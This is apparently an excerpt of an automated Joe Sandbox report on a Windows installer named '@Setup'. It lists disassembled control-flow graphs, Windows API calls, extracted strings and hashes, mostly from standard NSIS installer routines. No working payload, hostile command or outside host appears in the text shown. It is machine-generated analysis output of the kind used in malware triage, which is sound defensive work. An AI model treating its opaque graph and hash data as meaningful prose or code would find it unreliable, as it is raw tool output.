                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                    • API String ID: 2872004960-3619442763
                                                                                                                                                    • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                    • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                    • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                    • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                                                                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                    • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                    • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,RaFill,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,RaFill,RaFill,00000000,00000000,RaFill,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$RaFill
                                                                                                                                                    • API String ID: 4286501637-178782404
                                                                                                                                                    • Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                    • Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 653 40337f-403398 654 4033a1-4033a9 653->654 655 40339a 653->655 656 4033b2-4033b7 654->656 657 4033ab 654->657 655->654 658 4033c7-4033d4 call 403336 656->658 659 4033b9-4033c2 call 403368 656->659 657->656 663 4033d6 658->663 664 4033de-4033e5 658->664 659->658 665 4033d8-4033d9 663->665 666 403546-403548 664->666 667 4033eb-403432 GetTickCount 664->667 670 403567-40356b 665->670 668 40354a-40354d 666->668 669 4035ac-4035af 666->669 671 403564 667->671 672 403438-403440 667->672 673 403552-40355b call 403336 668->673 674 40354f 668->674 675 4035b1 669->675 676 40356e-403574 669->676 671->670 677 403442 672->677 678 403445-403453 call 403336 672->678 673->663 686 403561 673->686 674->673 675->671 681 403576 676->681 682 403579-403587 call 403336 676->682 677->678 678->663 687 403455-40345e 678->687 681->682 682->663 690 40358d-40359f WriteFile 682->690 686->671 689 403464-403484 call 4076a0 687->689 696 403538-40353a 689->696 697 40348a-40349d GetTickCount 689->697 692 4035a1-4035a4 690->692 693 40353f-403541 690->693 692->693 695 4035a6-4035a9 692->695 693->665 695->669 696->665 698 4034e8-4034ec 697->698 699 40349f-4034a7 697->699 700 40352d-403530 698->700 701 4034ee-4034f1 698->701 702 4034a9-4034ad 699->702 703 4034af-4034e0 MulDiv wsprintfW call 404f9e 699->703 700->672 707 403536 700->707 705 403513-40351e 701->705 706 4034f3-403507 WriteFile 701->706 702->698 702->703 708 4034e5 703->708 710 403521-403525 705->710 706->693 709 403509-40350c 706->709 707->671 708->698 709->693 711 40350e-403511 709->711 710->689 712 40352b 710->712 711->710 712->671
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00426976,00403792,00000000), ref: 004034FF
                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                    • String ID: (]C$... %d%%$pAB$v)B$viB
                                                                                                                                                    • API String ID: 651206458-946357456
                                                                                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 713 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 716 403603-403608 713->716 717 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 713->717 718 4037e2-4037e6 716->718 725 403641 717->725 726 403728-403736 call 4032d2 717->726 728 403646-40365d 725->728 732 4037f1-4037f6 726->732 733 40373c-40373f 726->733 730 403661-403663 call 403336 728->730 731 40365f 728->731 737 403668-40366a 730->737 731->730 732->718 735 403741-403759 call 403368 call 403336 733->735 736 40376b-403795 GlobalAlloc call 403368 call 40337f 733->736 735->732 764 40375f-403765 735->764 736->732 762 403797-4037a8 736->762 740 403670-403677 737->740 741 4037e9-4037f0 call 4032d2 737->741 742 4036f3-4036f7 740->742 743 403679-40368d call 405e38 740->743 741->732 749 403701-403707 742->749 750 4036f9-403700 call 4032d2 742->750 743->749 760 40368f-403696 743->760 753 403716-403720 749->753 754 403709-403713 call 4072ad 749->754 750->749 753->728 761 403726 753->761 754->753 760->749 766 403698-40369f 760->766 761->726 767 4037b0-4037b3 762->767 768 4037aa 762->768 764->732 764->736 766->749 769 4036a1-4036a8 766->769 770 4037b6-4037be 767->770 768->767 769->749 771 4036aa-4036b1 769->771 770->770 772 4037c0-4037db SetFilePointer call 405e38 770->772 771->749 773 4036b3-4036d3 771->773 776 4037e0 772->776 773->732 775 4036d9-4036dd 773->775 777 4036e5-4036ed 775->777 778 4036df-4036e3 775->778 776->718 777->749 779 4036ef-4036f1 777->779 778->761 778->777 779->749
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                    Strings
                                                                                                                                                    • Null, xrefs: 004036AA
                                                                                                                                                    • Error launching installer, xrefs: 00403603
                                                                                                                                                    • soft, xrefs: 004036A1
                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                    • Inst, xrefs: 00403698
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
